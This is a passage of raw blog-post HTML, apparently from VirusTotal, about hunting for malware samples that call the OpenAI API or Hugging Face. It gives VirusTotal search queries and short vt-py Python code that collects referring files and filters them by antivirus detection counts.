font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">” uses Process Explorer drivers to elevate privileges during execution as well.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Although the most popular infection vector for the samples analyzed are other samples (like droppers or compressed files), we found some of them distributed through legitimate websites, hosting services and web applications, and Discord. We believe the latter is on the verge of discontinuation, as they've recently </span><a href="https://www.bleepingcomputer.com/news/security/discord-will-switch-to-temporary-file-links-to-block-malware-delivery/" style="text-decoration-line: none;"><span style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">announced</span></a><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> a shift in their Content Delivery Network (CDN) approach.</span></p><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Additionally, we searched for samples communicating with platforms hosting AI models based on the findings of the following Kaspersky's </span><a href="https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">blog post</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">, where a </span><a href="https://www.virustotal.com/gui/file/0fe9d3f9c3dd4c71f9e9adc01a18ac62ad7efef7ca8d73a9ddc0cea4a02fe91c/relations" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">sample</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> downloads a potential malicious model from </span><a href="http://huggingface.co" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">huggingface.co</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">. You can find the following </span><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A5%252B%2520(behavior_network%253Ahuggingface.co%2520or%2520embedded_url%253Ahuggingface.co%2520or%2520embedded_domain%253Ahuggingface.co)/files" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">query</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> to find suspicious samples communicating with this domain.</span></span></span></div></span></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-weight: 700;">Suspicious samples using OpenAI’s API</span></h4><br /><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The number of suspicious samples interacting in some way with </span><a href="http://api.openai.com" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">api.openai.com</span></a><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> shows a slow growing trend, with a peak in August 2023.</span></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbd4jLPMHPcaOP40wlq8puLVzoI87HlmGFbFiBHxQrmGf0A38QueiwJMssz_9SSkCv0eo4GPZfnIJfdRZIsqULUfRzbLU1tPER9A_dJdx4q2cYd2WSBwb8ynQ4dB4DiEwVDOZW8-Pqn-n9y43Zlwaplgk7hxsdrbJlA_yWg-C8udhhvS13Wf06PxybGM/s1866/Screenshot%202023-11-29%20at%2009.06.48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="806" data-original-width="1866" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbd4jLPMHPcaOP40wlq8puLVzoI87HlmGFbFiBHxQrmGf0A38QueiwJMssz_9SSkCv0eo4GPZfnIJfdRZIsqULUfRzbLU1tPER9A_dJdx4q2cYd2WSBwb8ynQ4dB4DiEwVDOZW8-Pqn-n9y43Zlwaplgk7hxsdrbJlA_yWg-C8udhhvS13Wf06PxybGM/s16000/Screenshot%202023-11-29%20at%2009.06.48.png" /></a></div><br /><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></span></div><div><span style="background-color: transparent; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span style="color: black; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">To search for files that contact or contain the OpenAI API endpoint you can use the following query:</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A5%252B%2520(embedded_domain%253Aapi.openai.com%2520or%2520behaviour_network%253Aapi.openai.com)/files" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">entity:file p:5+ (embedded_domain:api.openai.com or behaviour_network:api.openai.com)</span></a></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Another option could be searching for common patterns when using the OpenAI API:</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A5%252B%2520(content%253Acode-davinci%2520or%2520content%253Atext-davinci%2520or%2520content%253A%2520api.openai.com)" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">entity:file p:5+ (content:code-davinci or content:text-davinci or content: api.openai.com)</span></a></p><br /><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">A third option is getting files related to the URL </span><a href="https://www.virustotal.com/gui/domain/api.openai.com/relations" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">api.openai.com</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">, which includes files that reference this domain and communicating files.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7UTp6MjCeIklqJBP_IIAXU519SzGv0U3fX29IF5owOGJXLqGsH_N7RCBBDO08OxSZ2v54Of-uKW-9kvSCipn7CfxZ3KHdCbUHIA9AMNF5FpjqRSrpmMUoCrFjY8tqoJ92QauqFn3DV0sHSyf3NS7cHaJPGNjqnMtknPkaYfROw3g83L23oi3FL9GGbyI/s1892/Screenshot%202023-11-29%20at%2009.13.07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="1892" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7UTp6MjCeIklqJBP_IIAXU519SzGv0U3fX29IF5owOGJXLqGsH_N7RCBBDO08OxSZ2v54Of-uKW-9kvSCipn7CfxZ3KHdCbUHIA9AMNF5FpjqRSrpmMUoCrFjY8tqoJ92QauqFn3DV0sHSyf3NS7cHaJPGNjqnMtknPkaYfROw3g83L23oi3FL9GGbyI/s16000/Screenshot%202023-11-29%20at%2009.13.07.png" /></a></div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">This can be automated to easily discriminate samples based on different criteria, such as detection rate, using </span><a href="https://github.com/VirusTotal/vt-py" style="font-size: 11pt; text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">VT-PY</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> or VirusTotal’s API. Let’s see an example.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The following code uses the API to get a list of entities communicating with </span><a href="http://api.openai.com" style="font-size: 11pt; text-decoration-line: none;"><span style="color: #1155cc; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">api.openai.com</span></a><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">, including referring files:</span></p><div style="background-color: #f7f7f7; line-height: 1.62857; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><i><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">malware_AI_objects = []<br /></span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">async</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #af00db; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> mai </span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">in</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> cli.iterator(<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'/intelligence/search'</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">,<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> params={<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'query'</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'https://api.openai.com'</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">,<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'attributes'</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: (</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">''</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">),<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'relationships'</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: (</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'referrer_files'</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)},<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> limit=</span><span style="background-color: transparent; color: #116644; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">):<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> malware_AI_objects.append(mai.to_dict())</span></i></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span id="docs-internal-guid-89f507d3-7fff-5fd6-d152-efdbb5f0d83a"></span></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt;">We can iterate over the previous query to obtain the list of all related files. The 'malware_AI_objects' variable contains the URLs to get additional details on them:</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwDEMxoEl9uFU8V50mSoqTv87kFxNkq-JqzNjl7rhOHSUZjubA-REazP9os3x5hqT8_4f13V5dQVAYf-ZDubX6b_qL6K6YzQ9ysSjgH4q5iIZz7tlZihYbG9qEohRtZdNB5Q0R58rgX0NPZ7gqhWrbXFtiPRHj_qBr76G5s1ipoxgViLWgYf9gybKSP_A/s1776/Screenshot%202023-11-29%20at%2009.13.52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="1776" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwDEMxoEl9uFU8V50mSoqTv87kFxNkq-JqzNjl7rhOHSUZjubA-REazP9os3x5hqT8_4f13V5dQVAYf-ZDubX6b_qL6K6YzQ9ysSjgH4q5iIZz7tlZihYbG9qEohRtZdNB5Q0R58rgX0NPZ7gqhWrbXFtiPRHj_qBr76G5s1ipoxgViLWgYf9gybKSP_A/s16000/Screenshot%202023-11-29%20at%2009.13.52.png" /></a></div><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt;"><br /></span><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt;">The following code iterates the previous list of URLs obtaining additional details in the 'last_analysis_stats' field to filter out malicious files.</span></p><div style="background-color: #f7f7f7; line-height: 1.62857; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><i><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">malware_AI_df = pd.DataFrame(<br /></span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> [{</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'domain'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: mai[</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'id'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">], **mai[</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'relationships'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]}<br /></span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #af00db; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> mai </span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">in</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> malware_AI_objects<br /></span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #af00db; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">if</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> mai[</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'relationships'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">][</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'referrer_files'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">][</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'data'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]])</span><br /><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">malware_AI_hashes = []<br /></span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">async</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #af00db; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> mai </span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">in</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> cli.iterator(</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'/urls/9b1b5eabf33c765585b7f7095d3cd726d73db49f3559376f426935bbd4a22d4b/referrer_files'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">,<br /></span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> params={</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'attributes'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: (</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'sha256,last_analysis_stats'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)},limit=</span><span style="background-color: transparent; color: #116644; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">):<br /></span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> malware_AI_hashes.append(mai.to_dict())</span></i></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><i><span id="docs-internal-guid-b13f63e6-7fff-2c2a-9457-04ea54e4acb5"></span></i></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt;">Finally, we can filter out results based on the number of AV detections provided in the “malicious” field.</span></p><div style="background-color: #f7f7f7; line-height: 1.62857; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><i>malware_AI_hashes_DF = pd.DataFrame(<br /></i></span><i><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> [{</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'sha256'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: mai[</span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'id'</span><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">]}<br /></span></i><i><span style="background-color: transparent; 